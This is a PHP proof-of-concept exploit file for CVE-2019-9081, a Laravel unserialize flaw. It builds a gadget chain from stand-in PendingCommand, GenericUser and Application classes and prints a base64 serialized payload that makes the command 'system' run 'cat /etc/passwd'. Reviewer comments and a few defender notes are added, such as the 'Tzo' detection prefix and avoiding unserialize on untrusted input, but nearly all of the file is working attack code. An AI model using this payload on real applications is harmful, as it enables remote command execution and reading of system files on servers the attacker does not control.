CVE-2019-9081_poc.php
<?php
namespace Illuminate\Foundation\Testing {
/**
 * Property-only stand-in declared under the framework's class name.
 *
 * This file defines nothing but the constructor, which copies its four
 * arguments into the properties so that serialize() records them under the
 * name Illuminate\Foundation\Testing\PendingCommand.
 *
 * NOTE(review): whatever makes this class dangerous to deserialize lives in the
 * real framework class, not here — confirm against the framework source for
 * the release covered by the CVE named in the file name.
 *
 * Defensive takeaway: when an application hands untrusted bytes to
 * unserialize(), the sender chooses every property value listed below.
 */
class PendingCommand
{
// Property names, visibility and declaration order all end up in the
// serialized form, so they are left exactly as written.
public $test; // in this PoC: an Illuminate\Auth\GenericUser instance
protected $app; // in this PoC: an Illuminate\Foundation\Application instance
protected $command; // in this PoC: the string "system"
protected $parameters; // the single argument wrapped in a one-element array (see constructor)
protected $hasExecuted = false; // serialized as false; NOTE(review): presumably consulted by the real class — confirm
/**
 * Stores the four values on the instance.
 *
 * @param mixed $command    stored as-is in $command
 * @param mixed $parameters wrapped in an array before being stored
 * @param mixed $test       stored as-is in $test
 * @param mixed $app        stored as-is in $app
 */
public function __construct($command, $parameters, $test, $app)
{
$this->command = $command;
// array(...) turns the one value passed in into a one-element list.
$this->parameters = array($parameters);
$this->test = $test;
$this->app = $app;
}
}
}
namespace Illuminate\Auth {
/**
 * Property-only stand-in declared under the name Illuminate\Auth\GenericUser.
 *
 * It carries one protected array, $attributes, and defines no methods beyond
 * the constructor. NOTE(review): how the real framework class exposes these
 * attributes is not shown in this file — confirm against the framework source.
 */
class GenericUser
{
// Name and visibility are part of the serialized form; keep them unchanged.
protected $attributes;
/**
 * @param array $attributes stored unchanged in $attributes
 */
public function __construct(array $attributes)
{
$this->attributes = $attributes;
}
}
}
namespace Illuminate\Foundation {
/**
 * Property-only stand-in declared under the name Illuminate\Foundation\Application.
 *
 * It carries one protected value, $bindings, and defines no methods beyond the
 * constructor. NOTE(review): how the real container resolves entries from
 * $bindings is not shown in this file — confirm against the framework source.
 */
class Application
{
// Name and visibility are part of the serialized form; keep them unchanged.
protected $bindings;
/**
 * @param mixed $bindings stored unchanged in $bindings (this PoC passes an array)
 */
public function __construct($bindings)
{
$this->bindings = $bindings;
}
}
}
namespace Payload {
use Illuminate\Auth\GenericUser;
use Illuminate\Foundation\Application;
use Illuminate\Foundation\Testing\PendingCommand;
// Builds one object graph from the classes declared in the namespaces above and
// prints it as a base64-encoded serialize() string. This file sends nothing
// anywhere; its only output is that string.
//
// Attributes for the GenericUser object: two keys, each holding a one-element list.
$temp1 = array("expectedOutput" => ['whatever'], "expectedQuestions" => ['whatever']);
// Bindings for the Application object: one contract name mapped to a "concrete" class name.
$temp2 = array("Illuminate\Contracts\Console\Kernel" => array("concrete" => "Illuminate\Foundation\Application"));
// Outer object: command name "system", one shell-command string, and the two objects above.
// NOTE(review): any effect on a target depends on the real framework classes acting
// on these values once the string is unserialized — that code is not in this file.
$evilObject = new PendingCommand("system", "cat /etc/passwd", new GenericUser($temp1), new Application($temp2));
// Defender notes:
// - serialize() output for an object starts with "O:", so its base64 form starts
//   with "Tzo"; that prefix in request parameters, cookies or headers is a common
//   hunting signal for serialized PHP objects.
// - Code that receives such input should not call unserialize() on it; use
//   json_decode(), or pass ['allowed_classes' => false] so no objects are instantiated.
echo base64_encode(serialize($evilObject));
}